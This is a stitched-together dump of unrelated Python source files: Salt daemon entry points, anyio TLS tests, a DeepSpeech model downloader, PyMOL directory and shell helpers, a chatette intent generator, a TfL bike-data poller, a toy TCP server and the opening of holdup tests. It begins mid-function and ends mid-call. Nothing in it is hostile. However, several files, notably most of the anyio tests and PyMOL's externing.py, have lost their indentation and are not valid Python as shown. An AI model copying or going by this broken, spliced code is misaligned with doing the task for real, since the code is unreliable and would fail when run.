    prev_sigint_handler = signal.getsignal(signal.SIGINT)
    prev_sigterm_handler = signal.getsignal(signal.SIGTERM)
    while True:
        try:
            process = multiprocessing.Process(target=minion_process)
            process.start()
            # Forward fatal/reload signals to the child actually running the
            # minion so it can shut down or reload cleanly.
            signal.signal(signal.SIGTERM,
                          functools.partial(escalate_signal_to_process,
                                            process.pid))
            signal.signal(signal.SIGINT,
                          functools.partial(escalate_signal_to_process,
                                            process.pid))
            signal.signal(signal.SIGHUP,
                          functools.partial(escalate_signal_to_process,
                                            process.pid))
        except Exception:  # pylint: disable=broad-except
            # if multiprocessing does not work
            minion = salt.cli.daemons.Minion()
            minion.start()
            break

        process.join()

        # Process exited or was terminated. Since we're going to try to restart
        # it, we MUST, reset signal handling to the previous handlers
        signal.signal(signal.SIGINT, prev_sigint_handler)
        signal.signal(signal.SIGTERM, prev_sigterm_handler)

        # Any exit code other than SALT_KEEPALIVE means the child does not
        # want to be restarted; propagate its exit code.
        if not process.exitcode == salt.defaults.exitcodes.SALT_KEEPALIVE:
            sys.exit(process.exitcode)

        # ontop of the random_reauth_delay already preformed
        # delay extra to reduce flooding and free resources
        # NOTE: values are static but should be fine.
        time.sleep(2 + randint(1, 10))

        # need to reset logging because new minion objects
        # cause extra log handlers to accumulate
        rlogger = logging.getLogger()
        for handler in rlogger.handlers:
            rlogger.removeHandler(handler)
        logging.basicConfig()
def proxy_minion_process(queue):
    '''
    Start a proxy minion process.

    Runs the ProxyMinion daemon in this (child) process. On a handled error
    the randomized restart delay is put on ``queue`` for the parent
    (salt_proxy) to sleep on before respawning; 0 means "do not restart".
    '''
    import salt.cli.daemons
    import salt.utils.platform
    # salt_minion spawns this function in a new process

    lock = threading.RLock()

    def suicide_when_without_parent(parent_pid):
        '''
        Have the minion suicide if the parent process is gone

        NOTE: there is a small race issue where the parent PID could be replace
        with another process with the same PID!
        '''
        # The main thread grabs `lock` in its `finally` on the way out; once
        # it holds the lock this watchdog can no longer acquire it and stops.
        while lock.acquire(blocking=False):
            lock.release()
            time.sleep(5)
            try:
                # check pid alive (Unix only trick!)
                os.kill(parent_pid, 0)
            except OSError:
                # forcibly exit, regular sys.exit raises an exception-- which
                # isn't sufficient in a thread
                os._exit(999)

    try:
        if not salt.utils.platform.is_windows():
            thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
            thread.start()

        restart = False
        proxyminion = None
        status = salt.defaults.exitcodes.EX_OK
        proxyminion = salt.cli.daemons.ProxyMinion()
        proxyminion.start()
    except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
        log.error('Proxy Minion failed to start: ', exc_info=True)
        restart = True
        # status is superfluous since the process will be restarted
        status = salt.defaults.exitcodes.SALT_KEEPALIVE
    except SystemExit as exc:
        # Deliberate exit (Ctrl+C, --version, ...): keep its code, no restart.
        restart = False
        status = exc.code
    finally:
        lock.acquire(blocking=True)

    if restart is True:
        log.warning('** Restarting proxy minion **')
        delay = 60
        if proxyminion is not None:
            if hasattr(proxyminion, 'config'):
                delay = proxyminion.config.get('random_reauth_delay', 60)
        random_delay = randint(1, delay)
        log.info('Sleeping random_reauth_delay of %s seconds', random_delay)
        # preform delay after minion resources have been cleaned
        queue.put(random_delay)
    else:
        queue.put(0)
    sys.exit(status)
def salt_proxy():
    '''
    Start a proxy minion.

    Keeps one proxy-minion subprocess running, restarting it after the delay
    that proxy_minion_process reports back on the shared queue.
    '''
    import salt.cli.daemons
    import salt.utils.platform
    import multiprocessing
    if '' in sys.path:
        sys.path.remove('')

    # No fork-based keepalive on Windows; run the proxy minion directly.
    if salt.utils.platform.is_windows():
        proxyminion = salt.cli.daemons.ProxyMinion()
        proxyminion.start()
        return

    if '--disable-keepalive' in sys.argv:
        sys.argv.remove('--disable-keepalive')
        proxyminion = salt.cli.daemons.ProxyMinion()
        proxyminion.start()
        return

    # keep one minion subprocess running
    while True:
        try:
            queue = multiprocessing.Queue()
        except Exception:
            # This breaks in containers
            proxyminion = salt.cli.daemons.ProxyMinion()
            proxyminion.start()
            return
        process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
        process.start()

        try:
            process.join()
            try:
                # The child reports its restart delay; 0 means "don't restart".
                restart_delay = queue.get(block=False)
            except Exception:
                if process.exitcode == 0:
                    # Minion process ended naturally, Ctrl+C or --version
                    break
                # Child died without reporting a delay; use a default.
                restart_delay = 60
            if restart_delay == 0:
                # Minion process ended naturally, Ctrl+C, --version, etc.
                sys.exit(process.exitcode)
            # delay restart to reduce flooding and allow network resources to close
            time.sleep(restart_delay)
        except KeyboardInterrupt:
            break
        # need to reset logging because new minion objects
        # cause extra log handlers to accumulate
        rlogger = logging.getLogger()
        for handler in rlogger.handlers:
            rlogger.removeHandler(handler)
        logging.basicConfig()
def salt_syndic():
    '''
    Start the salt syndic.
    '''
    import salt.utils.process
    salt.utils.process.notify_systemd()

    import salt.cli.daemons

    my_pid = os.getpid()
    try:
        daemon = salt.cli.daemons.Syndic()
        daemon.start()
    except KeyboardInterrupt:
        # Translate Ctrl-c into a SIGTERM to ourselves for a clean shutdown.
        os.kill(my_pid, 15)
def salt_key():
    '''
    Manage the authentication keys with salt-key.
    '''
    import salt.cli.key

    try:
        key_client = salt.cli.key.SaltKey()
        _install_signal_handlers(key_client)
        key_client.run()
    except Exception as err:  # pylint: disable=broad-except
        # CLI entry point: report the error on stderr instead of a traceback.
        sys.stderr.write("Error: {0}\n".format(err))
def salt_cp():
    '''
    Publish commands to the salt system from the command line on the
    master.
    '''
    import salt.cli.cp

    cp_client = salt.cli.cp.SaltCPCli()
    _install_signal_handlers(cp_client)
    cp_client.run()
def salt_call():
    '''
    Directly call a salt command in the modules, does not require a running
    salt minion to run.
    '''
    import salt.cli.call

    # Drop the implicit CWD entry from sys.path.
    if '' in sys.path:
        sys.path.remove('')
    caller = salt.cli.call.SaltCall()
    _install_signal_handlers(caller)
    caller.run()
def salt_run():
    '''
    Execute a salt convenience routine.
    '''
    import salt.cli.run

    # Drop the implicit CWD entry from sys.path.
    if '' in sys.path:
        sys.path.remove('')
    runner_client = salt.cli.run.SaltRun()
    _install_signal_handlers(runner_client)
    runner_client.run()
def salt_ssh():
    '''
    Execute the salt-ssh system.

    On SaltClientError the error is surfaced either as a hard crash (when
    the client's hard_crash option is set) or as a graceful SystemExit.
    '''
    import salt.cli.ssh

    if '' in sys.path:
        sys.path.remove('')
    # Bug fix: bind before the try block. Previously, if SaltSSH() itself
    # raised SaltClientError, `client` was unbound and reading
    # `client.options` in the handler raised an uncaught NameError.
    client = None
    try:
        client = salt.cli.ssh.SaltSSH()
        _install_signal_handlers(client)
        client.run()
    except SaltClientError as err:
        trace = traceback.format_exc()
        try:
            hardcrash = client.options.hard_crash
        except (AttributeError, KeyError):
            hardcrash = False
        _handle_interrupt(
            SystemExit(err),
            err,
            hardcrash, trace=trace)
def salt_cloud():
    '''
    The main function for salt-cloud
    '''
    # Define 'salt' global so we may use it after ImportError. Otherwise,
    # UnboundLocalError will be raised.
    global salt  # pylint: disable=W0602

    try:
        # Late-imports for CLI performance
        import salt.cloud
        import salt.cloud.cli
    except ImportError as e:
        # No salt cloud on Windows
        log.error('Error importing salt cloud: %s', e)
        print('salt-cloud is not available in this system')
        sys.exit(salt.defaults.exitcodes.EX_UNAVAILABLE)

    if '' in sys.path:
        sys.path.remove('')

    cloud_client = salt.cloud.cli.SaltCloud()
    _install_signal_handlers(cloud_client)
    cloud_client.run()
def salt_api():
    '''
    The main function for salt-api
    '''
    import salt.utils.process
    salt.utils.process.notify_systemd()

    import salt.cli.api

    api = salt.cli.api.SaltAPI()  # pylint: disable=E1120
    api.start()
def salt_main():
    '''
    Publish commands to the salt system from the command line on the
    master.
    '''
    import salt.cli.salt

    # Drop the implicit CWD entry from sys.path.
    if '' in sys.path:
        sys.path.remove('')
    cmd_client = salt.cli.salt.SaltCMD()
    _install_signal_handlers(cmd_client)
    cmd_client.run()
def salt_spm():
    '''
    The main function for spm, the Salt Package Manager

    .. versionadded:: 2015.8.0
    '''
    import salt.cli.spm

    package_manager = salt.cli.spm.SPM()  # pylint: disable=E1120
    package_manager.run()
def salt_extend(extension, name, description, salt_dir, merge):
    '''
    Quickstart for developing on the saltstack installation

    .. versionadded:: 2016.11.0
    '''
    import salt.utils.extend

    options = dict(extension=extension,
                   name=name,
                   description=description,
                   salt_dir=salt_dir,
                   merge=merge)
    salt.utils.extend.run(**options)
def salt_support():
    '''
    Run Salt Support that collects system data, logs etc for debug and support purposes.
    :return:
    '''
    import salt.cli.support.collector

    # Drop the implicit CWD entry from sys.path.
    if '' in sys.path:
        sys.path.remove('')
    collector_client = salt.cli.support.collector.SaltSupport()
    _install_signal_handlers(collector_client)
    collector_client.run()
|
test_tls.py | import socket
import ssl
from contextlib import ExitStack
from threading import Thread
import pytest
from anyio import BrokenResourceError, connect_tcp
from anyio.abc import SocketAttribute
from anyio.streams.tls import TLSAttribute, TLSStream
pytestmark = pytest.mark.anyio
class TestTLSStream:
    async def test_send_receive(self, server_context, client_context):
        """Round-trips bytes through a TLSStream against a blocking stdlib
        TLS server running in a background thread."""
        def serve_sync():
            # Accept one TLS client, echo the first 10 bytes reversed, close.
            conn, addr = server_sock.accept()
            conn.settimeout(1)
            data = conn.recv(10)
            conn.send(data[::-1])
            conn.close()

        server_sock = server_context.wrap_socket(socket.socket(), server_side=True,
                                                 suppress_ragged_eofs=False)
        server_sock.settimeout(1)
        # Bind to an ephemeral port so tests can run in parallel.
        server_sock.bind(('127.0.0.1', 0))
        server_sock.listen()
        server_thread = Thread(target=serve_sync)
        server_thread.start()

        async with await connect_tcp(*server_sock.getsockname()) as stream:
            wrapper = await TLSStream.wrap(stream, hostname='localhost',
                                           ssl_context=client_context)
            await wrapper.send(b'hello')
            response = await wrapper.receive()

        server_thread.join()
        server_sock.close()
        assert response == b'olleh'
async def test_extra_attributes(self, server_context, client_context):
def serve_sync():
conn, addr = server_sock.accept()
with conn:
conn.settimeout(1)
conn.recv(1)
server_context.set_alpn_protocols(['h2'])
client_context.set_alpn_protocols(['h2'])
server_sock = server_context.wrap_socket(socket.socket(), server_side=True,
suppress_ragged_eofs=True)
server_sock.settimeout(1)
server_sock.bind(('127.0.0.1', 0))
server_sock.listen()
server_thread = Thread(target=serve_sync)
server_thread.start()
async with await connect_tcp(*server_sock.getsockname()) as stream:
wrapper = await TLSStream.wrap(stream, hostname='localhost',
ssl_context=client_context, standard_compatible=False)
for name, attribute in SocketAttribute.__dict__.items():
if not name.startswith('_'):
assert wrapper.extra(attribute) == stream.extra(attribute)
assert wrapper.extra(TLSAttribute.alpn_protocol) == 'h2'
assert isinstance(wrapper.extra(TLSAttribute.channel_binding_tls_unique), bytes)
assert isinstance(wrapper.extra(TLSAttribute.cipher), tuple)
assert isinstance(wrapper.extra(TLSAttribute.peer_certificate), dict)
assert isinstance(wrapper.extra(TLSAttribute.peer_certificate_binary), bytes)
assert wrapper.extra(TLSAttribute.server_side) is False
assert isinstance(wrapper.extra(TLSAttribute.shared_ciphers), list)
assert isinstance(wrapper.extra(TLSAttribute.ssl_object), ssl.SSLObject)
assert wrapper.extra(TLSAttribute.standard_compatible) is False
assert wrapper.extra(TLSAttribute.tls_version).startswith('TLSv')
server_thread.join()
server_sock.close()
async def test_unwrap(self, server_context, client_context):
def serve_sync():
conn, addr = server_sock.accept()
conn.settimeout(1)
conn.send(b'encrypted')
unencrypted = conn.unwrap()
unencrypted.send(b'unencrypted')
unencrypted.close()
server_sock = server_context.wrap_socket(socket.socket(), server_side=True,
suppress_ragged_eofs=False)
server_sock.settimeout(1)
server_sock.bind(('127.0.0.1', 0))
server_sock.listen()
server_thread = Thread(target=serve_sync)
server_thread.start()
async with await connect_tcp(*server_sock.getsockname()) as stream:
wrapper = await TLSStream.wrap(stream, hostname='localhost',
ssl_context=client_context)
msg1 = await wrapper.receive()
stream, msg2 = await wrapper.unwrap()
if msg2 != b'unencrypted':
msg2 += await stream.receive()
server_thread.join()
server_sock.close()
assert msg1 == b'encrypted'
assert msg2 == b'unencrypted'
@pytest.mark.skipif(not ssl.HAS_ALPN, reason='ALPN support not available')
async def test_alpn_negotiation(self, server_context, client_context):
def serve_sync():
conn, addr = server_sock.accept()
conn.settimeout(1)
conn.send(conn.selected_alpn_protocol().encode())
conn.close()
server_context.set_alpn_protocols(['dummy1', 'dummy2'])
client_context.set_alpn_protocols(['dummy2', 'dummy3'])
server_sock = server_context.wrap_socket(socket.socket(), server_side=True,
suppress_ragged_eofs=False)
server_sock.settimeout(1)
server_sock.bind(('127.0.0.1', 0))
server_sock.listen()
server_thread = Thread(target=serve_sync)
server_thread.start()
async with await connect_tcp(*server_sock.getsockname()) as stream:
wrapper = await TLSStream.wrap(stream, hostname='localhost',
ssl_context=client_context)
assert wrapper.extra(TLSAttribute.alpn_protocol) == 'dummy2'
server_alpn_protocol = await wrapper.receive()
server_thread.join()
server_sock.close()
assert server_alpn_protocol == b'dummy2'
@pytest.mark.parametrize('server_compatible, client_compatible', [
pytest.param(True, True, id='both_standard'),
pytest.param(True, False, id='server_standard'),
pytest.param(False, True, id='client_standard'),
pytest.param(False, False, id='neither_standard')
])
async def test_ragged_eofs(self, server_context, client_context, server_compatible,
client_compatible):
def serve_sync():
nonlocal server_exc
conn, addr = server_sock.accept()
try:
conn.settimeout(1)
conn.sendall(b'hello')
if server_compatible:
conn.unwrap()
except BaseException as exc:
server_exc = exc
finally:
conn.close()
client_cm = ExitStack()
if client_compatible and not server_compatible:
client_cm = pytest.raises(BrokenResourceError)
server_exc = None
server_sock = server_context.wrap_socket(socket.socket(), server_side=True,
suppress_ragged_eofs=not server_compatible)
server_sock.settimeout(1)
server_sock.bind(('127.0.0.1', 0))
server_sock.listen()
server_thread = Thread(target=serve_sync)
server_thread.start()
stream = await connect_tcp(*server_sock.getsockname())
wrapper = await TLSStream.wrap(stream, hostname='localhost', ssl_context=client_context,
standard_compatible=client_compatible)
with client_cm:
assert await wrapper.receive() == b'hello'
await wrapper.aclose()
server_thread.join()
server_sock.close()
if not client_compatible and server_compatible:
assert isinstance(server_exc, OSError)
assert not isinstance(server_exc, socket.timeout)
else:
assert server_exc is None
|
installModels.py |
import os
import shutil
import threading
from pathlib import Path
import requests
from pydeepspeech.util import get_appdatadir
# AI model (DeepSpeech graph + scorer) used for the application.
_VERSION = 'v0.9.3'
_URLS = [
    'https://itml.cl.indiana.edu/models/tr/output_graph.pbmm',
    'https://itml.cl.indiana.edu/models/tr/kenlm.scorer',
]
# Per-version install directory under the per-user application data dir.
MODEL_DIR = os.path.join(get_appdatadir(), 'model', _VERSION)
# Stamp file whose presence marks the model install as complete.
IS_FINISHED_STAMP = os.path.join(MODEL_DIR, 'is_finished')
def download_file(url, outfile) -> None:
    """Stream *url* to *outfile*, downloading to a '.tmp' file first.

    The temporary file is only moved into place after the whole body has
    been written, so a partial download never appears at *outfile*.
    A KeyboardInterrupt aborts this download quietly (the caller joins the
    downloading thread in short slices precisely to allow this).
    """
    # NOTE the stream=True parameter below
    try:
        tmp = f'{outfile}.tmp'
        if os.path.exists(tmp):
            os.remove(tmp)  # stale leftover from an earlier aborted run
        with requests.get(url, stream=True) as r:
            r.raise_for_status()  # fail fast on HTTP errors
            with open(tmp, 'wb') as f:
                for chunk in r.iter_content(chunk_size=8192):
                    # If you have chunk encoded response uncomment if
                    # and set chunk_size parameter to None.
                    #if chunk:
                    f.write(chunk)
        # BUGFIX: os.replace is atomic and, unlike os.rename, also succeeds
        # on Windows when outfile already exists.
        os.replace(tmp, outfile)
    except KeyboardInterrupt:
        print(f'Aborted download of {url}')
        return
def url_to_local_name(url: str) -> str:
    """Map a download URL to its destination path inside MODEL_DIR."""
    basename = url.rsplit('/', 1)[-1]
    return os.path.join(MODEL_DIR, basename)
def installModels() -> None:
    """Download every model file into MODEL_DIR (first run only).

    Each URL is fetched on its own daemon thread; the is_finished stamp is
    only written once every expected file is actually present, so a failed
    or interrupted install is retried on the next call.
    """
    os.makedirs(MODEL_DIR, exist_ok=True)
    threads = {}
    if os.path.exists(IS_FINISHED_STAMP):
        return  # already installed
    print('Downloading and installing the models for the first time. This may take a while.')
    for url in _URLS:
        local_filename = url_to_local_name(url)
        t = threading.Thread(
            target=download_file, args=(url, local_filename))
        print(f'Downloading {url} -> {local_filename}')
        threads[url] = t
        t.daemon = True  # never block interpreter exit
        t.start()
    for url, t in threads.items():
        while t.is_alive():  # short joins keep KeyboardInterrupt responsive
            t.join(.2)
        print(f'Finished downloading {url}')
    # BUGFIX: the stamp used to be written unconditionally, which marked a
    # failed or partial download as a finished install forever after.
    if all(os.path.exists(url_to_local_name(url)) for url in _URLS):
        Path(IS_FINISHED_STAMP).touch()
def installModelsIfNecessary() -> str:
    """Ensure the models are installed and return the model directory."""
    print(f'Model directory is: {MODEL_DIR}')
    installModels()  # no-op when the is_finished stamp already exists
    return MODEL_DIR


if __name__ == '__main__':
    installModelsIfNecessary()
|
run_threads.py | """I start all the threads necessary to control the slave nodes and receive info from the backend
controller"""
from threading import Thread
from typing import Type
from .abstract import AbstractSetup, AbstractSlave
from .project_logger import set_up_logging
from .chain_controller_interface import start_controller_server
from .http_server import start_slave_server
from .meta_scenario import run_scenario
LOG = set_up_logging(__name__)
def orchestrate(port: int, slave_class: Type[AbstractSlave], setup=None):
    """
    I run the orchestration of a scenario. Provide me with a port where I
    listen to the backend controller. I also need a Slave class that defines
    how to talk to the slaves. Additionally a Setup object can be provided.

    :param port: Where I listen for input from the controller
    :param slave_class: A Class which contains the implementation how to communicate with the slave
    :param setup: An object that allows for additional setup of the blockchain if needed;
        defaults to a fresh AbstractSetup()
    :return:
    """
    # BUGFIX: the default used to be 'setup=AbstractSetup()', a mutable
    # default argument created once at import time and shared by every call.
    if setup is None:
        setup = AbstractSetup()
    Thread(target=start_controller_server, args=[port]).start()
    Thread(target=start_slave_server, args=[setup, slave_class]).start()
    Thread(target=run_scenario, args=[]).start()
    LOG.info('All threads started')
|
externing.py | #A* -------------------------------------------------------------------
#B* This file contains source code for the PyMOL computer program
#C* Copyright (c) Schrodinger, LLC.
#D* -------------------------------------------------------------------
#E* It is unlawful to modify or remove this copyright notice.
#F* -------------------------------------------------------------------
#G* Please see the accompanying LICENSE file for further information.
#H* -------------------------------------------------------------------
#I* Additional authors of this source file include:
#-*
#-*
#-*
#Z* -------------------------------------------------------------------
from __future__ import print_function
if __name__=='pymol.externing':
import os
import pymol
import string
from . import parsing
import threading
cmd = __import__("sys").modules["pymol.cmd"]
import traceback
from glob import glob
from .cmd import _cmd,lock,unlock,Shortcut,QuietException, \
_feedback,fb_module,fb_mask, exp_path, \
DEFAULT_ERROR, DEFAULT_SUCCESS, _raising, is_ok, is_error
def cd(dir="~",complain=1,quiet=1):
'''
DESCRIPTION
"cd" changes the current working directory.
USAGE
cd <path>
SEE ALSO
pwd, ls, system
'''
dir = exp_path(dir)
try:
os.chdir(dir) # raises on error
if not quiet:
print(" cd: now in %s"%os.getcwd())
except:
if complain:
traceback.print_exc()
return DEFAULT_SUCCESS
def pwd():
'''
DESCRIPTION
Print current working directory.
USAGE
pwd
SEE ALSO
cd, ls, system
'''
print(os.getcwd())
return DEFAULT_SUCCESS
def ls(pattern=None):
'''
DESCRIPTION
List contents of the current working directory.
USAGE
ls [pattern]
dir [pattern]
EXAMPLES
ls
ls *.pml
SEE ALSO
cd, pwd, system
'''
if pattern==None:
pattern = "*"
else:
pattern = exp_path(pattern)
if '*' not in pattern:
lst = glob(os.path.join(pattern, '*'))
else:
lst = []
if not len(lst):
lst = glob(pattern)
if len(lst):
lst.sort()
lst = parsing.list_to_str_list(lst)
for a in lst:
print(a)
else:
print(" ls: Nothing found. Is that a valid path?")
return DEFAULT_SUCCESS
    def system(command,async=0,_self=cmd):
        '''
DESCRIPTION

    "system" executes a command in a subshell under Unix or Windows.

USAGE

    system command

PYMOL API

    cmd.system(string command,int async=0)

NOTES

    async can only be specified from the Python level (not the command language)

    if async is 0 (default), then the result code from "system" is returned in r

    if async is 1, then the command is run in a separate thread whose object is
    returned

    NOTE(review): 'async' became a reserved word in Python 3.7, so this
    definition only parses on Python 2 / <=3.6 as written. Renaming the
    parameter would break callers that pass async= by keyword, so it is
    left untouched here.

SEE ALSO

    ls, cd, pwd
        '''
        r = None
        if async:
            # Fire-and-forget: the caller receives the Thread object.
            r = threading.Thread(target=_cmd.system,args=(str(command),1))
            r.start()
        else:
            # Synchronous: the caller receives the subshell's result code.
            r = _cmd.system(_self._COb,str(command),0)
        return r # special meaning
def paste(_self=cmd): # INTERNAL
r=DEFAULT_SUCCESS
lst = []
if hasattr(pymol,"machine_get_clipboard"):
lst = pymol.machine_get_clipboard()
if len(lst):
new_lst = []
for a in lst:
while len(a):
if ord(a[-1])>32:
break
else:
a=a[:-1]
# if nothing in the queue, this special string is printed; so
# we ignore it
if len(a):
if a=="""PRIMARY selection doesn't exist or form "STRING" not defined""":
new_list = []
else:
new_lst.append(a)
r = _cmd.paste(_self._COb,new_lst)
if _raising(r,_self): raise pymol.CmdException
return r
|
definition.py | import random
#from typing import List
from chatette_qiu.units import UnitDefinition#, Example
from .example import IntentExample
from threading import Thread
import time
class IntentDefinition(UnitDefinition):
    """
    This class represents the definition of an intent,
    containing all the rules it can generate from.
    """
    def __init__(self, name, modifiers, rules=None):
        super(IntentDefinition, self).__init__(name, modifiers, rules=rules)
        self.type = "intent"
        # None means "generate every possibility" TODO
        self.nb_training_examples_asked = None
        self.nb_testing_examples_asked = None

    def set_nb_examples_asked(self, nb_training_examples_asked, nb_testing_examples_asked=None):
        """Record how many training/testing examples generation should produce."""
        self.nb_training_examples_asked = nb_training_examples_asked
        self.nb_testing_examples_asked = nb_testing_examples_asked

    def generate_random(self, variation_name=None, arg_value=None):
        """Generate one random example, wrapped as an IntentExample."""
        example = \
            super(IntentDefinition, self).generate_random(variation_name, arg_value)
        return IntentExample.from_example(self.name, example)

    def generate_all(self, variation_name=None, arg_value=None):
        """Generate every possible example, wrapped as IntentExamples."""
        examples = \
            super(IntentDefinition, self).generate_all(variation_name, arg_value)
        return [IntentExample.from_example(self.name, ex) for ex in examples]

    def _generate_all_capped(self, max_nb_examples):
        # Helper: every possible example, truncated at max_nb_examples.
        return [
            IntentExample(self.name, ex.text.strip(), ex.entities)
            for (i, ex) in enumerate(self.generate_all())
            if i < max_nb_examples
        ]

    def generate(self, max_nb_examples, training_examples=None):# -> List[Example]:
        """
        Generates all the examples that were asked (i.e. as much examples
        as asked). The number of generated examples is tied to a maximum though TODO.
        When `training_examples` is `None`, this will generate the training examples
        (i.e. the number of training examples asked); otherwise, it will generate
        examples that are not in `training_examples` (if possible).
        """
        if training_examples is None and self.nb_training_examples_asked is None:
            return self._generate_all_capped(max_nb_examples)
        nb_examples_asked = self.nb_training_examples_asked
        if training_examples is not None:
            if self.nb_testing_examples_asked is None:
                return []  # No examples must be generated
            nb_examples_asked = self.nb_testing_examples_asked
        if nb_examples_asked <= 0:
            return []
        nb_possible_ex = self.get_max_nb_generated_examples()
        if nb_examples_asked > nb_possible_ex:
            # Asked for more than exists: fall back to "everything".
            if training_examples is None:
                return self._generate_all_capped(max_nb_examples)
            return [
                ex
                for ex in self._generate_all_capped(max_nb_examples)
                if ex not in training_examples
            ]
        if nb_examples_asked > max_nb_examples:
            nb_examples_asked = max_nb_examples
        if nb_examples_asked < nb_possible_ex / 2:  # QUESTION: should this be /2?
            # BUGFIX: this used to spawn 30 threads that appended to a shared
            # list, with no lock, while also testing its length -- the result
            # could overshoot nb_examples_asked and spammed stdout with a
            # progress print per item. A sequential loop produces exactly
            # nb_examples_asked examples deterministically in count.
            # NOTE(review): like the threaded version it replaced, this does
            # not deduplicate samples or exclude training_examples -- confirm
            # whether that is intended (the commented-out historical code did).
            generated_examples = []
            while len(generated_examples) < nb_examples_asked:
                current_example = self.generate_random()
                current_example.text = current_example.text.strip()  # Strip for safety
                generated_examples.append(
                    IntentExample(self.name, current_example.text,
                                  current_example.entities))
            return generated_examples
        all_examples = [
            IntentExample(self.name, ex.text.strip(), ex.entities)
            for ex in self.generate_all()
        ]
        if training_examples is None:
            return random.sample(all_examples, nb_examples_asked)
        random.shuffle(all_examples)
        return [
            ex for ex in all_examples
            if ex not in training_examples
        ]

    def _get_template_decl(self, variation=None):
        """Render this intent's template declaration line, including the
        asked train/test counts when set."""
        result = '%' + \
            super(IntentDefinition, self)._get_template_decl(variation)
        if self.nb_training_examples_asked is not None:
            result += "(train:" + str(self.nb_training_examples_asked)
            if self.nb_testing_examples_asked is not None:
                result += ", test:" + str(self.nb_testing_examples_asked) + ')'
        elif self.nb_testing_examples_asked is not None:
            result += "(test:" + str(self.nb_testing_examples_asked) + ')'
        return result

    def short_desc_str(self):
        """
        Returns a str representing a short description of this unit description.
        """
        desc = super(IntentDefinition, self).short_desc_str() + '\n'
        if self.nb_training_examples_asked is None:
            desc += "# training examples: all\n"
        else:
            desc += "# training examples: " + \
                str(self.nb_training_examples_asked) + '\n'
        if self.nb_testing_examples_asked is None:
            desc += "# testing examples: all"
        else:
            desc += "# testing examples: " + str(self.nb_testing_examples_asked)
        return desc
|
main.py | from quixstreaming import QuixStreamingClient
from quixstreaming.app import App
from quix_functions import QuixFunctions
from datetime import datetime, timezone
import traceback
from tfl_api import get_agg_bikepoint_data
from threading import Thread
import os
# Flag polled by get_data(); cleared by before_shutdown() to stop the loop.
run = True

# Quix injects credentials automatically to the client. Alternatively, you can
# always pass an SDK token manually as an argument.
client = QuixStreamingClient()

print("Opening output topic")
output_topic = client.open_output_topic(os.environ["output"])

# CREATE A STREAM
# A stream is a collection of data that belong to a single session of a single source.

# Initiate streams
output_stream = output_topic.create_stream("Available-Bikes")

# Give the stream human readable name. This name will appear in data catalogue.
output_stream.properties.name = "Available Bikes Location"

# Save stream in specific folder in data catalogue to help organize your workspace.
output_stream.properties.location = "/Bikes"

# Flush buffered parameter data at most every second / per 1s window.
output_stream.parameters.buffer.buffer_timeout = 1000
output_stream.parameters.buffer.time_span_in_milliseconds = 1000
def get_data():
    """Poll the TfL BikePoint API and forward each snapshot to Quix.

    Runs until the module-level 'run' flag is cleared by before_shutdown().
    NOTE(review): there is no sleep in this loop, so it polls as fast as the
    API responds -- confirm this request rate is intended.
    """
    quix_functions = QuixFunctions(output_stream)
    while run:
        try:
            # Current timestamp
            current_time = datetime.now(timezone.utc)
            # TfL API request; the aggregated frame is not used here
            # (was an unused local 'df_agg').
            df, _ = get_agg_bikepoint_data()
            quix_functions.data_handler(df, current_time)
        except Exception:
            # Best-effort loop: log the traceback and keep polling.
            print(traceback.format_exc())
def before_shutdown():
    """Signal the polling loop in get_data() to stop."""
    global run
    run = False
def main():
    """Run the data poller on a worker thread while the Quix app runs."""
    thread = Thread(target=get_data)
    thread.start()

    # Blocks until shutdown; before_shutdown clears the run flag first so
    # the worker loop can exit.
    App.run(before_shutdown=before_shutdown)

    # wait for worker thread to end
    thread.join()

    print("Exiting")


if __name__ == "__main__":
    main()
|
tcp_server.py | import socket, threading, time
"""Sample of TCP server"""
def handler(sock, addr):
    """Serve one client: greet it, then reply 'Hello <msg>' per message
    until 'exit' or EOF, then close the connection."""
    print('[Server %s] accepted new connection.' % threading.current_thread().getName())
    # BUGFIX: socket.send may transmit only part of the buffer; sendall
    # retries until every byte is written.
    sock.sendall(b'Welcome!')
    while True:
        data = sock.recv(1024)
        time.sleep(1)  # artificial delay to simulate work
        if not data or data.decode('UTF-8') == 'exit':
            break
        sock.sendall(('Hello %s' % data.decode('UTF-8')).encode('UTF-8'))
    sock.close()
    print('[Server %s] closed connection.' % threading.current_thread().getName())
# Listening socket: one handler thread is spawned per accepted connection.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 9999))
s.listen(10)  # backlog of 10 pending connections
print('[Server] began to listen.')

while True:
    # Accept forever; each client is served on its own thread.
    sock, addr = s.accept()
    t = threading.Thread(target=handler, args=(sock, addr))
    t.start()
|
test_holdup.py | import os
import socket
import ssl
import threading
import pytest
try:
from inspect import getfullargspec as getargspec
except ImportError:
from inspect import getargspec
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
pytest_plugins = 'pytester',
def urlopen_has_ssl_context():
    """Return False when urlopen accepts an SSL 'context' argument.

    NOTE(review): the name reads inverted -- it returns False precisely when
    urlopen *does* support 'context'. It is referenced by name inside
    skipif("...") strings below, so the insecure-TLS tests only run where
    the argument exists; renaming would break those string references,
    hence the contract is preserved and only the shape is simplified.
    """
    # Guard clause replaces the old nested if/else pyramid.
    if not hasattr(ssl, 'create_default_context'):
        return True
    urlopen_argspec = getargspec(urlopen)
    urlopen_args = urlopen_argspec.args
    if hasattr(urlopen_argspec, 'kwonlyargs'):
        urlopen_args.extend(urlopen_argspec.kwonlyargs)
    return 'context' not in urlopen_args
@pytest.fixture(params=[[], ['--', 'python', '-c', 'print("success !")']])
def extra(request):
    """Parametrized trailing CLI args: nothing, or a command to exec on success."""
    return request.param
def test_normal(testdir, extra):
    """All three check types (tcp://, path://, unix://) pass when their
    targets exist."""
    tcp = socket.socket()
    tcp.bind(('127.0.0.1', 0))  # ephemeral port
    tcp.listen(1)
    _, port = tcp.getsockname()
    # accept() blocks until holdup's probe connects; run it off-thread.
    t = threading.Thread(target=tcp.accept)
    t.start()
    uds = socket.socket(socket.AF_UNIX)
    if os.path.exists('/tmp/holdup-test.sock'):
        os.unlink('/tmp/holdup-test.sock')
    with open('/tmp/holdup-test', 'w'):
        pass  # path:// only needs the file to exist and be readable
    uds.bind('/tmp/holdup-test.sock')
    uds.listen(1)
    result = testdir.run(
        'holdup',
        '-t', '0.5',
        'tcp://localhost:%s/' % port,
        'path:///tmp/holdup-test',
